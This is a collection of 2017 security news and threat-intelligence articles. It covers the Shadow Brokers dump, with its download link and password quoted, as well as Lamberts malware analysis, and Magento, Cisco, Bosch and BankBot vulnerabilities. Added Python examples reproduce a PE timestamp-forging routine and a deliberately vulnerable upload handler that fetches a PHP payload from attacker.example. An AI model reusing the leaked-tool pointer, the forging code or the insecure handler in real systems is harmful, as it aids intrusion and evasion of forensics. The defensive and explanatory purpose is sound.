Today the Shadow Brokers group released another piece of the precious archive allegedly stolen from the NSA: a 117.9 MB encrypted dump that includes three folders named Windows, Swift, and OddJob, containing 23 new hacking tools.

Some of the codenames for the hacking tools in the archive are OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar.

The tools and exploits released today have been specifically designed to target earlier versions of the Windows operating system; this latest batch of documents suggests the NSA was targeting the SWIFT banking system of several banks around the world.

The hackers published a blog post titled “Lost in Translation,” which included a link to the archive and the password.

“Follow the links for new dumps. Windows. Swift. Oddjob. Oh you thought that was it? Some of you peoples is needing reading comprehension.

https://yadi.sk/d/NJqzpqo_3GxZA4
Password = Reeeeeeeeeeeeeee”

reads the blog post.

The whole archive, including this last portion, is now available on GitHub.
Security researchers immediately started digging into the trove of files.

x0rz (@x0rz), 11:44 AM, 14 Apr 2017:
Windows exploits, payloads and implants of #EquationGroup dumped by the #ShadowBrokers: confirmed.
Hacker Fantastic (@hackerfantastic), 3:04 PM, 14 Apr 2017:
EMERALDTHREAD is an exploit (unpatched?) for Windows XP to Windows 2003 SP2.
The hacking tools in the Windows folder work against older versions of Windows (Windows XP) and Server 2003.

The folder OddJob contains a Windows implant and includes alleged configuration files and payloads, also in this case targeted versions are older ones like Windows Server 2003 Enterprise up to Windows XP Professional.

According to security expert Kevin Beaumont, who analyzed the dump, some of the Windows exploits had never been seen by detection services before.
Kevin Beaumont (@GossiTheDog), 12:45, 14 Apr 2017:
So far the first 3 exploits in Windows/Exploits haven't been on VirusTotal before, nor in Palo-Alto Autofocus.
But the SWIFT folder contains a PowerPoint document that could reveal a disconcerting reality. The PPT contains credentials and data on the internal architecture of EastNets, one of the largest SWIFT Service Bureaus in the Middle East.

The folder includes SQL scripts that could be used to query an Oracle database for a wide range of information, including the list of users and the SWIFT message queries.

The folder also contains Excel files that suggest the NSA-linked Equation Group had hacked many banks worldwide, most of them in Middle Eastern countries (i.e. UAE, Kuwait, Qatar, Palestine, and Yemen).

Matt Suiche (@msuiche), 17:48, 14 Apr 2017:
SWIFT Host of Palestinian Bank was running Windows 2008 R2 vulnerable to exploit framework FUZZBUNCH. #ShadowBrokers cc @hackerfantastic
But EastNets’ CEO has denied that NSA hackers ever compromised the company’s systems.
“The reports of an alleged hacker-compromised EastNets Service Bureau (ENSB) network are totally false and unfounded,” EastNets’ CEO Hazem Mulhim told Motherboard in an email. “The EastNets Network internal Security Unit has run a complete check of its servers and found no hacker compromise or any vulnerabilities,” reads the official statement issued by the company.
“The EastNets Service Bureau runs on a separate secure network that cannot be accessed over the public networks. The photos shown on twitter, claiming compromised information, are about pages that are outdated and obsolete, generated on a low-level internal server that has been retired since 2013.”

“While we cannot ascertain the information that has been published, we can confirm that no EastNets customer data has been compromised in any way”


Cisco warns of two critical issues in IOS and Apache Struts
14.4.2017 securityaffairs  Vulnerebility

Cisco issued two “critical” security advisories, one for Cisco IOS and Cisco IOS XE Software, another for a flaw affecting Apache Struts 2.
Today Cisco issued two “critical” security advisories, the first for Cisco IOS and Cisco IOS XE Software, the second for the recently disclosed flaw affecting Apache Struts 2.

The Cisco IOS vulnerability lies in the Cisco Cluster Management Protocol (CMP) and could be exploited by an unauthenticated, remote attacker to trigger a DoS condition by forcing a reload of the device, or to remotely execute code with elevated privileges.

“A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges.” reads the Cisco Security Advisory.

According to Cisco a wide range of devices is affected by the flaw, including the Cisco Catalyst 2350-48TD-S Switch and the Cisco SM-X Layer 2/3 EtherSwitch Service Module.

“The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: The failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device, and the incorrect processing of malformed CMP-specific Telnet options.” states Cisco.

An attacker could exploit the vulnerability by establishing a Telnet session with a vulnerable device and sending malformed CMP-specific Telnet options. At the time of writing there is no workaround that temporarily fixes the problem.

“An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device,” continues the advisory.

As for the flaw in Apache Struts 2, Cisco confirmed that some of its products using the framework could be remotely hacked. The remote code execution flaw disclosed by Apache in March, tracked as CVE-2017-5638, affects the Jakarta-based file upload Multipart parser.

The IT giant is still investigating which of its products are affected; so far the company has confirmed that Cisco SocialMiner, Identity Services Engine (ISE), Prime License Manager and others are vulnerable.


Unraveling the Lamberts Toolkit
14.4.2017 Kaspersky Attack

Yesterday, our colleagues from Symantec published their analysis of Longhorn, an advanced threat actor that can be easily compared with Regin, ProjectSauron, Equation or Duqu2 in terms of its complexity.

Longhorn, which we internally refer to as “The Lamberts”, first came to the attention of the ITSec community in 2014, when our colleagues from FireEye discovered an attack using a zero day vulnerability (CVE-2014-4148). The attack leveraged malware we called ‘BlackLambert’, which was used to target a high profile organization in Europe.

Since at least 2008, The Lamberts have used multiple sophisticated attack tools against high-profile victims. Their arsenal includes network-driven backdoors, several generations of modular backdoors, harvesting tools, and wipers. Versions for both Windows and OSX are known at this time, with the latest samples created in 2016.

Although the operational security displayed by actors using the Lamberts toolkit is very good, one sample includes a PDB path that points to a project named “Archan~1” (perhaps ‘Archangel’). The root folder on the PDB path is named “Hudson”. This is one of the very few mistakes we’ve seen with this threat actor.

While in most cases the infection vector remains unknown, the high profile attack from 2014 used a very complex Windows TTF zero-day exploit (CVE-2014-4148).

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family. For more information please contact: intelreports@kaspersky.com

Figure 1. Lamberts discovery timeline

The first time the Lambert family malware was uncovered publicly was in October 2014, when FireEye posted a blog about a zero day exploit (CVE-2014-4148) used in the wild. The vulnerability was patched by Microsoft at the same time. We named the malware involved ‘Black Lambert’ and described it thoroughly in a private report, available to Kaspersky APT Intel Reports subscribers.

The authors of Black Lambert included a couple of very interesting details in the sample, which read as the following: toolType=wl, build=132914, versionName = 2.0.0. Looking for similar samples, we were able to identify another generation of related tools which we called White Lambert. While Black Lambert connects directly to its C&C for instructions, White Lambert is a fully passive, network-driven backdoor.

                 Black Lambert   White Lambert
Implant type     Active          Passive
toolType         wl              aa (“ArchAngel”)
build            132914          113140
versionName      2.0.0           5.0.2

Internal configuration similarities in Black and White Lambert

White Lambert runs in kernel mode and intercepts network traffic on infected machines. It decrypts packets crafted in a special format to extract instructions. We named these passive backdoors ‘White Lambert’ to contrast with the active “Black Lambert” implants.

Looking further for any other malware related to White Lambert and Black Lambert, we came by another generation of malware that we called Blue Lambert.

One of the Blue Lambert samples is interesting because it appears to have been used as second stage malware in a high profile attack, which involved the Black Lambert malware.

Looking further for malware similar to Blue Lambert, we came by another family of malware we called Green Lambert. Green Lambert is a lighter, more reliable, but older version of Blue Lambert. Interestingly, while most Blue Lambert variants have version numbers in the range of 2.x, Green Lambert is mostly in 3.x versions. This stands in opposition to the data gathered from export timestamps and C&C domain activity that points to Green Lambert being considerably older than the Blue variant. Perhaps both Blue and Green Lamberts have been developed in parallel by two different teams working under the same umbrella, as normal software version iterations, with one seeing earlier deployment than the other.

Signatures created for Green Lambert (Windows) have also triggered on an OS X variant of Green Lambert, with a very low version number: 1.2.0. This was uploaded to a multiscanner service in September 2014. The OS X variant of Green Lambert is in many regards functionally identical to the Windows version, however it misses certain functionality such as running plugins directly in memory.

Kaspersky Lab detections for Blue, Black, and Green Lamberts have been triggered by a relatively small set of victims from around the world. While investigating one of these infections involving White Lambert (network-driven implant) and Blue Lambert (active implant), we found yet another family of tools that appear to be related. We called this new family Pink Lambert.

The Pink Lambert toolset includes a beaconing implant, a USB-harvesting module and a multi-platform orchestrator framework which can be used to create OS-independent malware. Versions of this particular orchestrator were found on other victims, together with White Lambert samples, indicating a close relationship between the White and Pink Lambert malware families.

By looking further for other undetected malware on victims of White Lambert, we found yet another apparently related family. The new family, which we called Gray Lambert is the latest iteration of the passive network tools from the Lamberts’ arsenal. The coding style of Gray Lambert is similar to the Pink Lambert USB-harvesting module, however, the functionality mirrors that of White Lambert. Compared to White Lambert, Gray Lambert runs in user mode, without the need for exploiting a vulnerable signed driver to load arbitrary code on 64-bit Windows variants.

Connecting all these different families by shared code, data formats, C&C servers, and victims, we have arrived at the following overarching picture:

Figure 2. An overview of connections between the Lambert families

The Lamberts in Brief – from Black to Gray

Below, we provide a small summary of all the Lamberts. A full description of all variants is available to subscribers of Kaspersky APT Reports. Contact intelreports@kaspersky.com

Black Lambert

The only known sample of Black Lambert was dropped by a TTF-exploit zero day (CVE-2014-4148). Its internal configuration included a proxy server which suggests the malware was created to work in a very specific network configuration, inside the victim’s network.

An internal description of Black Lambert indicates what appears to be a set of markers used by the attackers to denote this particular branch: toolType=wl, build=132914, versionName = 2.0.0.

Hash                               Description
683afdef710bf3c96d42e6d9e7275130   generic loader (hdmsvc.exe)
79e263f78e69110c09642bbb30f09ace   winlib.dll, final payload (toolType=wl)

Blue Lambert

The Blue Lambert implants contain what appear to be version numbers in the 2.x range, together with project/operation codename sets, which may also indicate codenames for the victims or campaigns.


Figure 4. Blue Lambert configuration in decrypted form, highlighting internal codenames

Known codenames include TRUE CRIME (2.2.0.2), CERVELO YARDBIRD (2.6.1.1), GAI SHU (2.2.0.5), DOUBLESIDED SCOOBYSNACK (2.3.0.2), FUNNELCAKE CARNIVAL (2.5.0.2), PROSPER SPOCK (2.0.0.2), RINGTOSS CARNIVAL (2.4.2.2), COD FISH (2.2.0.0), and INVERTED SHOT (2.6.2.3).

Green Lambert

Green Lambert is a family of tools deeply related to Blue Lambert. The functionality is very similar, both Blue and Green are active implants. The configuration data shares the same style of codenames for victims, operations, or projects.


Figure 5. Green Lambert configuration block (decrypted) highlighting internal codenames

The Green Lambert family is the only one where non-Windows variants have been found. An old version of Green Lambert, compiled for OS X was uploaded from Russia to a multiscanner service in 2014. Its internal codename is HO BO (1.2.0).

The Windows versions of Green Lambert have the following code names: BEARD BLUE (2.7.1), GORDON FLASH (3.0), APE ESCAPE (3.0.2), SPOCK LOGICAL (3.0.2), PIZZA ASSAULT (3.0.5), and SNOW BLOWER (3.0.5).

Interestingly, one of the droppers of Green Lambert abused an ICS software package named “Subway Environmental Simulation Program” or “SES”, which has been available on certain forums visited by engineers working with industrial software. Similar techniques have been observed in the past from other threat groups, for instance, trojanized Oracle installers by the Equation group.

White Lambert

White Lambert is a family of tools that share the same internal description as Black Lambert. Known tool types, builds, and version names include:

ToolType “aa”, protocol 3, version 7, versionName 5.0.2, build 113140
ToolType “aa”, protocol 3, version 7, versionName 5.0.0, build 113140
ToolType “aa”, protocol 3, version 6, versionName 4.2.0, build 110836M
ToolType “aa”, protocol 3, version 5, versionName 3.2.0
One of the White Lambert samples is interesting because it has a forgotten PDB path inside, which points to “Archan~1” and “Hudson”. Hudson could be a project name, if the authors name their projects after rivers in the US, or it could be the developer’s first name. The truncated (8.3) path “archan~1” most likely stands for “Archangel”, and the tool type “aa” could likewise suggest “ArchAngel”. By comparison, the Black Lambert tool type “wl” has no known meaning.


White Lambert samples run in kernel mode and sniff network traffic looking for special packets containing instructions to execute. To run unsigned code in kernel mode on 64-bit Windows, White Lambert uses an exploit against a signed, legitimate SiSoftware Sandra driver. The same method was used before by Turla, ProjectSauron, and Equation’s Grayfish, with other known, legitimate drivers.

Pink Lambert

Pink Lambert is a suite of tools initially discovered on a White Lambert victim. It includes a beaconing implant, partially based on publicly available source code. The source code on top of which Pink Lambert’s beaconing implant was created is “A Fully Featured Windows HTTP Wrapper in C++”.


Figure 6. “A Fully Featured Windows HTTP Wrapper” by shicheng

Other tools in the Pink Lambert suite include USB stealer modules and a very complex multi-platform orchestrator.

In a second incident, a Pink Lambert orchestrator was found on another White Lambert victim, substantiating the connection between the Pink and White Lamberts.

Gray Lambert

Gray Lambert is the most recent tool in the Lamberts’ arsenal. It is a network-driven backdoor, similar in functionality to White Lambert. Unlike White Lambert, which runs in kernel mode, Gray Lambert is a user-mode implant. The compilation and coding style of Gray Lambert is similar to the Pink Lambert USB stealers. Gray Lambert initially appeared on the computers of victims infected by White Lambert, which could suggest the authors were upgrading White Lambert infections to Gray. This migration activity was last observed in October 2016.

Some of the known filenames for Gray Lambert are mwapi32.dll and poolstr.dll – it should be pointed though that the filenames used by the Lamberts are generally unique and have never been used twice.

Timeline

Most of the Blue and Green Lambert samples have two C&C servers hardcoded in their configuration block: a hostname and an IP address. Using our own pDNS as well as DomainTools IP history, we plotted the times when the C&C servers were active and pointing to the same IP address as the one from the configuration block.

Unfortunately, this method doesn’t work for all samples, since some of them don’t have a domain for C&C. Additionally, in some cases we couldn’t find any pDNS information for the hostname configured in the malware.

Luckily, the attackers have made a few mistakes, which allow us to identify the activity times for most of the other samples. For instance, in cases where no pDNS information was available for a subdomain of the main C&C domain, the domain registration dates were sufficient to show when the activity began. Additionally, in some cases the top-level domain pointed to the same IP address as the one in the configuration file, allowing us to identify the activity times.

Another worthwhile analysis method focuses on the set of Blue Lambert samples that have exports. Although most compilation timestamps in the PE header appear to have been tampered with (to reflect a 2003-2004 range), the authors forgot to alter the timestamp in the export section. This allowed us to identify not just the real activity/compilation timestamps, but also the method used for faking the compilation timestamps in the PE header.

It seems the algorithm used to tamper with the samples was the following: subtract 0x10 from the highest byte of the timestamp (which amounts to about eight and a half years) and then randomize the lowest 3 bytes. From this we conclude that the original compilation times of the Blue Lambert samples were in the range of 2012-2015.
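The tampering scheme just described, reproduced and then inverted as an added example (my own code, not Kaspersky's; the function names and the sample timestamps are assumptions, the only input taken from the report is the algorithm itself). Because the low three bytes are randomized, only the high byte of the header timestamp carries information, so the triage check compares high bytes and the recovery step can only narrow the original build time to a 194-day bucket; with the untouched export-directory timestamp alongside, the mismatch becomes a positive indicator of tampering.

```python
"""Reproduce and invert the PE timestamp tampering described for Blue Lambert.

Added illustration, not code from the report. The report states the algorithm
(subtract 0x10 from the highest byte of the 32-bit timestamp, randomize the low
three bytes); everything else here, names and sample values included, is my own.
"""
from datetime import datetime, timezone
from typing import Dict, Optional, Tuple

SECONDS_PER_HIGH_BYTE = 1 << 24  # 16,777,216 s, roughly 194 days per high-byte step
TAMPER_SHIFT = 0x10              # the report's constant: 0x10 high-byte steps


def tamper_timestamp(original_ts: int, low24: int) -> int:
    """Apply the described tampering.

    low24 stands in for the randomized low three bytes so the function is
    deterministic and testable; the real tool would draw them from an RNG.
    """
    if not 0 <= low24 <= 0xFFFFFF:
        raise ValueError("low24 must fit in three bytes")
    high = (original_ts >> 24) & 0xFF
    if high < TAMPER_SHIFT:
        raise ValueError("timestamp too small to shift back")
    return ((high - TAMPER_SHIFT) << 24) | low24


def shift_in_years() -> float:
    """How far back the high-byte subtraction moves a timestamp (about 8.5 years)."""
    return TAMPER_SHIFT * SECONDS_PER_HIGH_BYTE / (365.25 * 86400)


def consistent_with_tampering(header_ts: int, export_ts: int) -> bool:
    """True when the PE header stamp looks like the export stamp after tampering.

    Only the high byte survives the randomization, so that is all that can be
    compared; the low three bytes of header_ts carry no information.
    """
    return ((header_ts >> 24) & 0xFF) + TAMPER_SHIFT == ((export_ts >> 24) & 0xFF)


def recover_window(header_ts: int) -> Tuple[int, int]:
    """Earliest and latest original timestamps compatible with a tampered header.

    Restoring the high byte pins the build to one 194-day bucket; the randomized
    low bytes mean nothing finer is recoverable without the export stamp.
    """
    high = ((header_ts >> 24) & 0xFF) + TAMPER_SHIFT
    lo = high << 24
    return lo, lo | 0xFFFFFF


def to_utc(ts: int) -> str:
    """Render an epoch timestamp as a UTC date string."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d")


def triage(header_ts: int, export_ts: Optional[int] = None) -> Dict[str, object]:
    """Summarize what can be said about a sample's real build time.

    header_ts: IMAGE_FILE_HEADER.TimeDateStamp; export_ts: the TimeDateStamp
    in the export directory, if the sample has one.
    """
    lo, hi = recover_window(header_ts)
    result: Dict[str, object] = {
        "header_utc": to_utc(header_ts),
        "window_utc": (to_utc(lo), to_utc(hi)),
        "tampered": None,
    }
    if export_ts is not None:
        result["export_utc"] = to_utc(export_ts)
        result["tampered"] = consistent_with_tampering(header_ts, export_ts)
    return result


if __name__ == "__main__":
    # Constructed sample: a build from mid-2013 stamped with the described algorithm.
    real_build = 1370000000  # 2013-05-31 UTC, a constructed value
    faked = tamper_timestamp(real_build, 0x123456)
    print(triage(faked, real_build))
```

On a real sample the two inputs come straight from the PE structures (the COFF header's TimeDateStamp and the export directory's TimeDateStamp, which any PE parser exposes); a header date years before the export date whose high byte differs by exactly 0x10 is the signature the report describes.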

Putting together all the various families, with recovered activity times, we come to the following picture:

Figure 8. A timeline of activity for known Lamberts

As can be seen from the chart above, Green Lambert is the oldest and longest-running member of the family, while Gray is the newest. White, Blue and Pink overlap somewhat in deployment, with Blue replacing Green Lambert. Black Lambert was seen only briefly and we assume it was “retired” from the arsenal after being discovered by FireEye in 2014.

Codenames and Popular Culture Referenced in Lamberts

The threat group(s) behind the Lambert toolkits have used a large number of codenames extensively throughout their projects. Some of these codenames are references to old computer games, Star Trek, and cartoons, which is very unusual for high profile APT groups. We really enjoyed going through the backstories of these codenames and wanted to provide them below for others to enjoy as well.

For instance, one of the Green Lambert versions has the internal codename “GORDON FLASH”, which can also be read as “FLASH GORDON”. Flash Gordon is the hero of a space opera adventure comic strip created and originally drawn by Alex Raymond. It was first published in 1934 and subsequently turned into a popular film in 1980.


Flash Gordon poster

A ‘Funnel cake’ is a regional food popular in North America at carnivals, fairs, sporting events, and seaside resorts. This explains the codename “FUNNELCAKE CARNIVAL”:


Figure 9. A typical funnel cake

Spock and Prosper obviously refer to Star Trek, the well-known science fiction television series created by Gene Roddenberry. Cdr. Spock is a half-Vulcan, half-human character, portrayed by Leonard Nimoy. “Live long and prosper” is the traditional Vulcan greeting in the series.


Leonard Nimoy as “Spock” displaying the traditional Vulcan greeting “Live long and prosper”

Ringtoss is a game that is very popular at carnivals in North America.


DOUBLESIDED SCOOBYSNACK is likely a reference to an NFL Lip Reading video featuring Adrian Peterson that went viral in mid-2013. According to the urban dictionary, it is also used to denote a sexual game in which the participants are dressed as Scooby-Doo and his master.

Ape Escape (also known as Saru Get You (サルゲッチュ Saru Getchu) in Japan) is a series of video games made by SCE Japan Studio, starting with Ape Escape for PlayStation in 1999. The series often incorporates ape-related humor, unique gameplay, and a wide variety of pop culture references; it is also notable for being the first game to make the DualShock or Dual Analog controller mandatory.

Ape Escape

INVERTED SHOT is likely a reference to a mixed martial arts move also known as an ‘Imanari roll takedown’, named after Masakazu Imanari who popularized the grappling technique. It consists of a modified Brazilian jiu-jitsu granby roll that places the fighter in inverted guard position while taking the opponent down to the mat.

GAI and SHU (as used in Green Lambert OS X) are characters from the Guilty Crown anime series. Gai Tsutsugami (恙神 涯 Tsutsugami Gai) is the 17-year-old resourceful and charismatic leader of the “Funeral Parlor” resistance group, while Shu Ouma (桜満 集 Ōma Shū) is the 17-year-old main protagonist of Guilty Crown.


Figure 10. Main characters of Guilty Crown with Shu Ouma in the middle.

Conclusions

The Lamberts toolkit spans across several years, with most activity occurring in 2013 and 2014. Overall, the toolkit includes highly sophisticated malware, which relies on high-level techniques to sniff network traffic, run plugins in memory without touching the disk, and leverages exploits against signed drivers to run unsigned code on 64-bit Windows.

To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit, deployment of Black Lambert included a rather sophisticated TTF zero day exploit, CVE-2014-4148. Taking that into account, we classify the Lamberts as the same level of complexity as Regin, ProjectSauron, Equation and Duqu2, which makes them one of the most sophisticated cyber espionage toolkits we have ever analysed.

Considering the complexity of these projects and the existence of an implant for OS X, we assume that it is highly possible that other Lamberts also exist for other platforms, such as Linux. The fact that in the vast majority of cases the infection method is unknown probably means there are still a lot of unknown details about these attacks and the group(s) leveraging them.

As usual, defense against attacks such as those from the Lamberts/Longhorn should include a multi-layered approach. Kaspersky products include special mitigation strategies against the malware used by this group, as well as the many other APT groups we track. If you are interested in reading more about effective mitigation strategies in general, we recommend the following articles:

Strategies for mitigating APTs
How to mitigate 85% of threats with four strategies
We will continue tracking the Lamberts and sharing new findings with our intel report subscribers, as well as with the general public. If you would like to be the first to hear our news, we suggest you subscribe to our intel reports.

Kaspersky Lab products successfully detect and eradicate all the known malware from the Lamberts family.


Unpatched Magento Flaw Exposes Online Stores to Attacks

14.4.2017 securityweek Vulnerebility
Magento, the popular e-commerce platform used by more than 250,000 merchants worldwide, is affected by a potentially serious vulnerability that can be exploited to hijack online stores, researchers warned.

The flaw was found by DefenseCode in November and reported to Magento via the company’s Bugcrowd-based bug bounty program. The vendor indicated at the time that it had been aware of the issue, but it still hasn’t addressed it. After its attempts to obtain a status update on the vulnerability failed, DefenseCode decided to make its findings public.

The vulnerability is related to a feature that allows users to add Vimeo video content for an existing product. When a video is added, Magento automatically retrieves a preview image via a POST request.

The request method can be changed from POST to GET, which allows an attacker to mount a cross-site request forgery (CSRF) attack and upload an arbitrary file. Although invalid image files are rejected, the file is saved on the server before it is validated.

The location of the file can be easily determined, enabling a hacker to upload a malicious PHP script to the server. In order to achieve remote code execution, the attacker also needs to upload a .htaccess file to the same directory.

For the attack to work, a hacker needs to convince a user with access to the shop’s administration panel, regardless of their role and permissions, to access a specially crafted web page that triggers the CSRF attack.
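The handler pattern the advisory describes, modelled as an added example in Python (my own illustration, not Magento's code): the weak form accepts any HTTP method, carries no CSRF token, writes the fetched file to disk before checking that it is an image, and lets the request influence the filename; the hardened form reverses each of those. Requests and sessions are plain dicts, the "remote" fetch is a constructed lookup table, and the parameter and function names are assumptions. The hardened handler goes slightly beyond the text by also choosing a random server-side filename with a content-derived extension, which is what removes both the predictable-location and the `.htaccess` problems.

```python
"""Weak versus hardened preview-image fetch, modelled on the Magento advisory.

Added illustration only; not Magento code. Names, parameters and sample
content are constructed for the example.
"""
import hmac
import os
import secrets
import tempfile

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
JPEG_MAGIC = b"\xff\xd8\xff"
UPLOAD_DIR = tempfile.mkdtemp(prefix="preview_")  # stands in for the media directory

# Constructed "remote" content: a genuine PNG header and a non-image payload.
FAKE_REMOTE = {
    "https://video.example/thumb.png": PNG_MAGIC + b"\x00" * 32,
    "https://attacker.example/not-an-image": b"<?php echo 'placeholder'; ?>",
}


def fetch_preview(url: str) -> bytes:
    """Placeholder for the HTTP fetch; real code would use urllib or requests."""
    return FAKE_REMOTE[url]


def upload_path(name: str) -> str:
    """Where the weak handler puts a file of the given name."""
    return os.path.join(UPLOAD_DIR, name)


def stored(path: str) -> bool:
    """Whether a file exists at the given path (used to observe side effects)."""
    return os.path.isfile(path)


def save_preview_weak(request: dict) -> str:
    """Weak handler: mirrors the three defects the advisory describes."""
    # 1. No method check: the action works as a GET, so a crafted link on a page
    #    the admin visits is enough to trigger it (CSRF).
    # 2. No CSRF token is required at all.
    data = fetch_preview(request["params"]["url"])
    # 3. The filename is taken from the request, and the file reaches disk
    #    before the image check runs; the check below never removes it.
    path = upload_path(request["params"].get("name", "preview.bin"))
    with open(path, "wb") as fh:
        fh.write(data)
    if not data.startswith((PNG_MAGIC, JPEG_MAGIC)):
        raise ValueError("not an image")  # too late: the file is already on disk
    return path


def issue_csrf_token(session: dict) -> str:
    """Bind a fresh random token to the admin session."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def save_preview_hardened(request: dict, session: dict) -> str:
    """Hardened handler: POST only, CSRF token, validate before write, server-chosen name."""
    if request["method"] != "POST":
        raise PermissionError("state-changing action requires POST")
    sent = request.get("headers", {}).get("X-CSRF-Token", "")
    expected = session.get("csrf_token", "")
    if not expected or not hmac.compare_digest(sent, expected):
        raise PermissionError("missing or invalid CSRF token")
    data = fetch_preview(request["params"]["url"])
    if data.startswith(PNG_MAGIC):
        ext = ".png"
    elif data.startswith(JPEG_MAGIC):
        ext = ".jpg"
    else:
        raise ValueError("not an image")  # rejected before anything touches disk
    # Random server-chosen name with the extension derived from the content:
    # no request-controlled name (no .php, no .htaccess) and no guessable path.
    path = os.path.join(UPLOAD_DIR, secrets.token_hex(16) + ext)
    with open(path, "wb") as fh:
        fh.write(data)
    return path
```

The order of the checks in the hardened handler is the point: method and token are verified before any network fetch, and the content is verified before any write, so a rejected request leaves nothing behind on the server.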

Researchers warned that successful exploitation of the vulnerability can allow an attacker to take complete control of a targeted system, including gain access to sensitive customer information stored in the compromised store’s database.

“Full administrative access is not required to exploit this vulnerability as any Magento administrative panel user regardless of assigned roles and permissions can access the remote image retrieval functionality. Therefore, gaining a low privileged access can enable the attacker to compromise the whole system or at very least, the database (e.g. traversing to /app/etc/env.php to grab the database password),” DefenseCode wrote in its advisory.

The latest security updates were released by Magento developers in February, when they addressed a critical remote code execution vulnerability that allegedly affected only a few systems.


Flaws in Bosch Car Dongle Allow Hackers to Stop Engine

14.4.2017 securityweek Vulnerebility
Vulnerabilities found by researchers in Bosch’s Drivelog Connect product can be exploited by hackers to inject malicious messages into a vehicle’s CAN bus. The vendor has implemented some fixes and is working on adding more attack protections.

Bosch’s Drivelog Connect is a service that provides information about the condition of a vehicle, including potential defects, service deadlines, and data on fuel consumption and driving behavior. The product includes a dongle called Drivelog Connector, which is connected to the car’s OBD2 diagnostics interface, and a mobile application that communicates with the dongle via Bluetooth.

Researchers at automotive cybersecurity firm Argus have identified some potentially serious vulnerabilities in the communications between the mobile app and the dongle.

One of the security holes is related to the authentication process between the Drivelog Connector and the Drivelog Connect smartphone app. The app is available for both iOS and Android, but experts focused on the Android application. The second flaw affects the dongle’s message filter.

According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID. However, this message filter can be bypassed by sending OEM-specific messages that can be obtained through CAN traffic monitoring or by fuzzing CAN bus messages.

An attack leveraging this message filter bypass can be launched by a hacker who has obtained root access to the targeted user’s smartphone. During the tests they conducted, Argus researchers said they managed to remotely stop the engine of a moving car by exploiting the vulnerability. They pointed out that, depending on the make and model of the car, other actions may have been possible.

This attack scenario requires root access to the Android device and a malicious patch to the mobile app. Car manufacturers have often pointed out that it’s difficult to prevent attacks once a smartphone has been compromised.

However, Argus researchers have found a way to launch attacks without this requirement. An information disclosure vulnerability in the authentication process between the app and the dongle allows an attacker to connect to a targeted device without hacking the phone first.

During the authentication process, the dongle sends any connecting Android device various pieces of information that can be used to obtain the user-supplied authorization PIN. The PIN can be brute-forced offline – the attack takes up to 30 minutes on a modern laptop – and it can then be used to connect to the dongle.

Once the connection has been established, the attacker can send malicious CAN bus messages from their own device instead of having to hijack the targeted user’s smartphone. This attack is mitigated by the fact that the hacker needs to be in Bluetooth range of the targeted vehicle.

In an advisory it published this week, Bosch said it addressed the authentication vulnerability on the server side by introducing two-step verification when additional users are registered to a device. The company is also working on a firmware update for the dongle to prevent attackers from sending unauthorized CAN messages from a hijacked mobile app.


Android Trojan Targeting Over 420 Banking Apps Worldwide Found On Google Play Store
14.4.2017 thehackernews Android


Do you like watching funny videos online?
I am not exactly a funny person, but I love watching funny video clips online; it is one of the best things people can do in their spare time.
But, beware if you have installed a funny video app from Google Play Store.
A security researcher has discovered a new variant of the infamous Android banking Trojan hiding in apps under different names, such as Funny Videos 2017, on Google Play Store.
Niels Croese, a security researcher at the firm Securify B.V., analyzed the Funny Videos app, which has 1,000 to 5,000 installs, and found that it behaves like any regular video application on the Play Store but, in the background, targets customers of banks around the world.
This newly discovered banking Trojan works like any other banking malware, but two things make it different from the others: its choice of targets and its use of the DexProtector tool to obfuscate the app's code.

Dubbed BankBot, the banking trojan targets customers of more than 420 banks around the world, including Citibank, ING, and some new Dutch banks, like ABN, Rabobank, ASN, Regiobank, and Binck, among many others.
How Android Banking Trojan Works
In a nutshell, BankBot is mobile banking malware that looks like a simple app and once installed, allows users to watch funny videos, but in the background, the app can intercept SMS and display overlays to steal banking information.
Mobile banking trojan often disguises itself as a plugin app, like Flash, or an adult content app, but this app made its way to Google Play Store by disguising itself as any other regular Android app.
Google has removed this malicious app from its Play Store after receiving the report from the researcher, but this does not mean that more such apps do not exist there with different names.
"Another problem is that Google [Play Store] mainly relies on automated scanning without a full understanding of the current obfuscation vectors resulting in banking malware on the Google Play Store," the researcher told The Hacker News.
Once downloaded, the app persistently requests administrative rights, and if granted, the banking malware can control everything that's happening on an infected smartphone.
The BankBot springs into action when the victim opens any of the mobile apps from a pre-configured list of 425 banking apps. A complete list of banks a BankBot variant is currently imitating can be found on the blog post published by the researcher.
Once one of the listed apps is opened, BankBot immediately displays an overlay, which is a page on the top of legitimate mobile banking app and tricks Android users entering their banking credentials into the overlay, just like a phishing attack.
This will not only sends your banking credentials to your bank’s servers but also sends your financial credentials to the server controlled by fraudsters.
This social engineering technique is often used by financially motivated criminals to deceive users into giving up their personal details and sensitive banking information to fraudsters.
How to protect yourself?
There are standard protection measures you need to follow to remain unaffected:
Install a good antivirus app that can detect and block such malware before it can infect your device. Always keep the app up to date.
Always stick to trusted sources, like the Google Play Store and the Apple App Store, and verify app permissions before installing apps. If any app is asking for more than what it is meant for, just do not install it.
Do not download apps from third-party sources. Although in this case the app was distributed through the official Play Store, most often such malware is distributed via untrusted third-party app stores.
Avoid unknown and unsecured Wi-Fi hotspots and keep your Wi-Fi turned off when not in use.
Be careful which apps you give administrative rights to. Admin rights are powerful and can give an app full control of your device.
Never click on links in SMS or MMS messages sent to your mobile phone. Even if the message looks legit, go directly to the website of origin and verify any possible updates.


Here's How Hacker Activated All Dallas Emergency Sirens On Friday Night
14.4.2017 thehackernews Incident
